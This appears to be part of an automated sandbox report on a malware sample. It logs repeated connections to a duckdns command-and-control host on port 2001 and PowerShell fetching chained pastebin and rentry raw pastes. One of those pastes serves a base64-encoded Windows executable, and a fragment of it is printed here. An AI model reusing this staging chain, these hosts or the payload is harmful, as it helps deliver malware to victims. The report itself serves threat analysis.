                                                                                              Oct 31, 2024 07:41:44.974277973 CET200149755181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:45.522367001 CET200149755181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:45.522449017 CET497552001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:45.522530079 CET497552001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:45.527394056 CET200149755181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:46.526601076 CET497562001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:46.531588078 CET200149756181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:46.531698942 CET497562001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:46.532179117 CET497562001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:46.536963940 CET200149756181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:47.077120066 CET200149756181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:47.077217102 CET497562001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:47.077311039 CET497562001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:47.082068920 CET200149756181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:48.089334965 CET497572001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:48.094672918 CET200149757181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:48.094806910 CET497572001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:48.095206022 CET497572001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:48.100560904 CET200149757181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:48.646112919 CET200149757181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:48.646222115 CET497572001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:48.646307945 CET497572001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:48.651187897 CET200149757181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:49.651438951 CET497582001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:49.656462908 CET200149758181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:49.656539917 CET497582001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:49.656958103 CET497582001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:49.661763906 CET200149758181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:50.208179951 CET200149758181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:50.208256006 CET497582001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:50.208363056 CET497582001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:50.213071108 CET200149758181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:51.214850903 CET497592001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:51.219916105 CET200149759181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:51.220024109 CET497592001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:51.220516920 CET497592001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:51.225285053 CET200149759181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:51.798034906 CET200149759181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:51.798150063 CET497592001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:51.798249006 CET497592001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:51.803155899 CET200149759181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:52.807745934 CET497602001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:52.812736034 CET200149760181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:52.812830925 CET497602001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:52.815630913 CET497602001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:52.820517063 CET200149760181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:53.365606070 CET200149760181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:53.365775108 CET497602001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:53.365859032 CET497602001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:53.370646000 CET200149760181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:30.081130028 CET200149957181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:30.635823011 CET200149957181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:30.635922909 CET499572001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:30.637116909 CET499572001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:30.641925097 CET200149957181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:31.292366982 CET499652001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:31.297219038 CET200149965181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:31.297301054 CET499652001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:31.297617912 CET499652001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:31.302341938 CET200149965181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:31.854777098 CET200149965181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:31.854931116 CET499652001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:31.854931116 CET499652001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:31.861011982 CET200149965181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:32.479537010 CET499742001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:32.484529018 CET200149974181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:32.484662056 CET499742001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:32.485126019 CET499742001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:32.489888906 CET200149974181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:33.040549040 CET200149974181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:33.040601969 CET499742001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:33.040630102 CET499742001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:33.045408010 CET200149974181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:33.652090073 CET499802001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:33.657464981 CET200149980181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:33.657536983 CET499802001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:33.657910109 CET499802001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:33.662765980 CET200149980181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:34.212222099 CET200149980181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:34.212301016 CET499802001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:34.212367058 CET499802001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:34.217212915 CET200149980181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:34.807990074 CET499892001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:34.812743902 CET200149989181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:34.812915087 CET499892001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:34.813150883 CET499892001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:34.817939043 CET200149989181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:35.369820118 CET200149989181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:35.369904041 CET499892001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:35.369972944 CET499892001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:35.375637054 CET200149989181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:35.948417902 CET499972001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:35.953207970 CET200149997181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:35.954240084 CET499972001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:35.954552889 CET499972001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:35.959337950 CET200149997181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:36.512645960 CET200149997181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:36.512710094 CET499972001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:36.512805939 CET499972001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:36.517867088 CET200149997181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:37.057840109 CET500032001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:37.062771082 CET200150003181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:37.063004017 CET500032001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:37.063221931 CET500032001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:37.068030119 CET200150003181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:37.623184919 CET200150003181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:37.623244047 CET500032001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:37.623311043 CET500032001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:37.628104925 CET200150003181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:38.152424097 CET500092001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:38.157294035 CET200150009181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:38.157397032 CET500092001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:38.157818079 CET500092001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:38.162678957 CET200150009181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:38.704931021 CET200150009181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:38.705033064 CET500092001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:38.705033064 CET500092001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:38.709965944 CET200150009181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:39.214597940 CET500182001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:39.219414949 CET200150018181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:39.219489098 CET500182001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:39.219851971 CET500182001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:39.224639893 CET200150018181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:39.769269943 CET200150018181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:39.769392967 CET500182001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:39.769445896 CET500182001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:39.774354935 CET200150018181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:40.261172056 CET500262001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:40.266078949 CET200150026181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:40.266196012 CET500262001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:40.270567894 CET500262001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:40.275464058 CET200150026181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:40.824454069 CET200150026181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:40.824512959 CET500262001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:40.824548006 CET500262001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:40.829324961 CET200150026181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:41.308228970 CET500322001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:41.313417912 CET200150032181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:41.313504934 CET500322001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:41.314002991 CET500322001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:41.321600914 CET200150032181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:41.860799074 CET200150032181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:41.864443064 CET500322001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:41.864443064 CET500322001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:41.869755030 CET200150032181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:42.338958025 CET500382001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:42.343837976 CET200150038181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:42.344068050 CET500382001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:42.344398975 CET500382001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:42.349208117 CET200150038181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:42.906213045 CET200150038181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:42.906270981 CET500382001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:42.906296968 CET500382001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:42.911118984 CET200150038181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:43.379971981 CET500442001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:43.384880066 CET200150044181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:43.384954929 CET500442001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:43.385289907 CET500442001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:43.390068054 CET200150044181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:43.937825918 CET200150044181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:43.938304901 CET500442001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:43.938363075 CET500442001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:43.943186045 CET200150044181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:44.370073080 CET500512001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:44.374952078 CET200150051181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:44.375264883 CET500512001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:44.375624895 CET500512001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:44.380413055 CET200150051181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:44.924477100 CET200150051181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:44.924537897 CET500512001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:44.924568892 CET500512001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:44.929406881 CET200150051181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:45.354468107 CET500582001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:45.359273911 CET200150058181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:45.359357119 CET500582001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:45.359620094 CET500582001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:45.364428043 CET200150058181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:45.910886049 CET200150058181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:45.914239883 CET500582001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:45.914287090 CET500582001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:45.919126987 CET200150058181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:46.323558092 CET500642001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:46.329150915 CET200150064181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:46.329224110 CET500642001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:46.329576015 CET500642001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:46.335578918 CET200150064181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:46.880870104 CET200150064181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:46.880928993 CET500642001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:46.880959988 CET500642001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:46.885777950 CET200150064181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:47.280165911 CET500672001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:47.285170078 CET200150067181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:47.285259962 CET500672001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:47.287882090 CET500672001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:47.292829990 CET200150067181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:47.830372095 CET200150067181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:47.832784891 CET500672001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:47.832961082 CET500672001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:47.837733984 CET200150067181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:48.214148998 CET500682001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:48.219053030 CET200150068181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:48.219134092 CET500682001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:48.219435930 CET500682001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:48.224236965 CET200150068181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:48.764230967 CET200150068181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:48.765429020 CET500682001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:48.765429020 CET500682001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:48.770400047 CET200150068181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:49.136048079 CET500692001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:49.141171932 CET200150069181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:49.141247988 CET500692001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:49.141592026 CET500692001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:49.146692038 CET200150069181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:49.691808939 CET200150069181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:49.692320108 CET500692001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:49.692399025 CET500692001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:49.697702885 CET200150069181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:50.058427095 CET500702001192.168.2.4181.236.112.169
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Oct 31, 2024 07:41:04.958941936 CET5619853192.168.2.41.1.1.1
                                                                                              Oct 31, 2024 07:41:04.965806007 CET53561981.1.1.1192.168.2.4
                                                                                              Oct 31, 2024 07:41:10.160072088 CET5645453192.168.2.41.1.1.1
                                                                                              Oct 31, 2024 07:41:10.251943111 CET53564541.1.1.1192.168.2.4
                                                                                              Oct 31, 2024 07:41:18.201740980 CET5500853192.168.2.41.1.1.1
                                                                                              Oct 31, 2024 07:41:18.209826946 CET53550081.1.1.1192.168.2.4
                                                                                              Oct 31, 2024 07:41:21.912794113 CET5560153192.168.2.41.1.1.1
                                                                                              Oct 31, 2024 07:41:22.021389961 CET53556011.1.1.1192.168.2.4
                                                                                              Oct 31, 2024 07:42:22.135646105 CET6002553192.168.2.41.1.1.1
                                                                                              Oct 31, 2024 07:42:22.238631010 CET53600251.1.1.1192.168.2.4
                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Oct 31, 2024 07:41:04.958941936 CET192.168.2.41.1.1.10xb4b4Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                                                              Oct 31, 2024 07:41:10.160072088 CET192.168.2.41.1.1.10x571bStandard query (0)rentry.orgA (IP address)IN (0x0001)false
                                                                                              Oct 31, 2024 07:41:18.201740980 CET192.168.2.41.1.1.10x5c8Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                              Oct 31, 2024 07:41:21.912794113 CET192.168.2.41.1.1.10xbd75Standard query (0)sost.duckdns.orgA (IP address)IN (0x0001)false
                                                                                              Oct 31, 2024 07:42:22.135646105 CET192.168.2.41.1.1.10xa916Standard query (0)sost.duckdns.orgA (IP address)IN (0x0001)false
                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Oct 31, 2024 07:41:04.965806007 CET1.1.1.1192.168.2.40xb4b4No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                                                              Oct 31, 2024 07:41:04.965806007 CET1.1.1.1192.168.2.40xb4b4No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                                              Oct 31, 2024 07:41:04.965806007 CET1.1.1.1192.168.2.40xb4b4No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                                              Oct 31, 2024 07:41:10.251943111 CET1.1.1.1192.168.2.40x571bNo error (0)rentry.org164.132.58.105A (IP address)IN (0x0001)false
                                                                                              Oct 31, 2024 07:41:18.209826946 CET1.1.1.1192.168.2.40x5c8No error (0)paste.ee188.114.97.3A (IP address)IN (0x0001)false
                                                                                              Oct 31, 2024 07:41:18.209826946 CET1.1.1.1192.168.2.40x5c8No error (0)paste.ee188.114.96.3A (IP address)IN (0x0001)false
                                                                                              Oct 31, 2024 07:41:22.021389961 CET1.1.1.1192.168.2.40xbd75No error (0)sost.duckdns.org181.236.112.169A (IP address)IN (0x0001)false
                                                                                              Oct 31, 2024 07:42:22.238631010 CET1.1.1.1192.168.2.40xa916No error (0)sost.duckdns.org181.236.112.169A (IP address)IN (0x0001)false
                                                                                              • pastebin.com
                                                                                              • rentry.org
                                                                                              • paste.ee
                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.449730104.20.3.235443980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-10-31 06:41:05 UTC169OUTGET /raw/J6uRjZrv HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                              Host: pastebin.com
                                                                                              Connection: Keep-Alive
                                                                                              2024-10-31 06:41:06 UTC391INHTTP/1.1 200 OK
                                                                                              Date: Thu, 31 Oct 2024 06:41:06 GMT
                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              x-frame-options: DENY
                                                                                              x-content-type-options: nosniff
                                                                                              x-xss-protection: 1;mode=block
                                                                                              cache-control: public, max-age=1801
                                                                                              CF-Cache-Status: EXPIRED
                                                                                              Last-Modified: Thu, 31 Oct 2024 06:41:06 GMT
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8db1a84b1aa14636-DFW
                                                                                              2024-10-31 06:41:06 UTC37INData Raw: 31 66 0d 0a 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 6f 72 67 2f 76 73 6d 34 6f 66 78 73 2f 72 61 77 0d 0a
                                                                                              Data Ascii: 1fhttps://rentry.org/vsm4ofxs/raw
                                                                                              2024-10-31 06:41:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.449731164.132.58.1054435480C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-10-31 06:41:11 UTC167OUTGET /vsm4ofxs/raw HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                              Host: rentry.org
                                                                                              Connection: Keep-Alive
                                                                                              2024-10-31 06:41:11 UTC319INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Thu, 31 Oct 2024 06:41:11 GMT
                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                              Content-Length: 82604
                                                                                              Connection: close
                                                                                              Vary: Origin
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                              Cache-Control: Vary
                                                                                              2024-10-31 06:41:11 UTC16065INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 50 79 66 49 57 63 41 41 41 41 41 41 41 41 41 41 4f 41 41 49 69 41 4c 41 56 41 41 41 4f 6f 41 41 41 41 47 41 41 41 41 41 41 41 41 54 67 6b 42 41 41 41 67 41 41 41 41 41 41 41 41 41 41 41 41 45 41 41 67 41 41 41 41 41 67 41
                                                                                              Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAPyfIWcAAAAAAAAAAOAAIiALAVAAAOoAAAAGAAAAAAAATgkBAAAgAAAAAAAAAAAAEAAgAAAAAgA
                                                                                              2024-10-31 06:41:11 UTC16384INData Raw: 47 39 38 41 41 41 4b 4b 67 4d 65 62 33 77 41 41 41 6f 71 41 78 38 73 62 33 77 41 41 41 6f 71 41 78 39 79 62 33 77 41 41 41 6f 71 41 78 39 30 62 33 77 41 41 41 6f 71 41 78 38 58 62 33 77 41 41 41 6f 71 41 78 38 4e 62 33 77 41 41 41 6f 71 41 78 38 4a 62 33 77 41 41 41 6f 71 41 78 74 76 66 41 41 41 43 69 6f 44 48 78 4e 76 66 41 41 41 43 69 6f 44 48 78 46 76 66 41 41 41 43 69 6f 44 48 78 5a 76 66 41 41 41 43 69 6f 44 49 4a 6f 41 41 41 42 76 66 41 41 41 43 69 6f 44 48 32 42 76 66 41 41 41 43 69 6f 44 48 7a 68 76 66 41 41 41 43 69 6f 44 49 4e 59 41 41 41 42 76 66 41 41 41 43 69 6f 44 49 49 34 41 41 41 42 76 66 41 41 41 43 69 6f 44 48 32 6c 76 66 41 41 41 43 69 6f 44 49 50 34 41 41 41 42 76 66 41 41 41 43 67 4d 61 62 33 77 41 41 41 6f 71 41 78 38 74 62 33 77 41
                                                                                              Data Ascii: G98AAAKKgMeb3wAAAoqAx8sb3wAAAoqAx9yb3wAAAoqAx90b3wAAAoqAx8Xb3wAAAoqAx8Nb3wAAAoqAx8Jb3wAAAoqAxtvfAAACioDHxNvfAAACioDHxFvfAAACioDHxZvfAAACioDIJoAAABvfAAACioDH2BvfAAACioDHzhvfAAACioDINYAAABvfAAACioDII4AAABvfAAACioDH2lvfAAACioDIP4AAABvfAAACgMab3wAAAoqAx8tb3wA
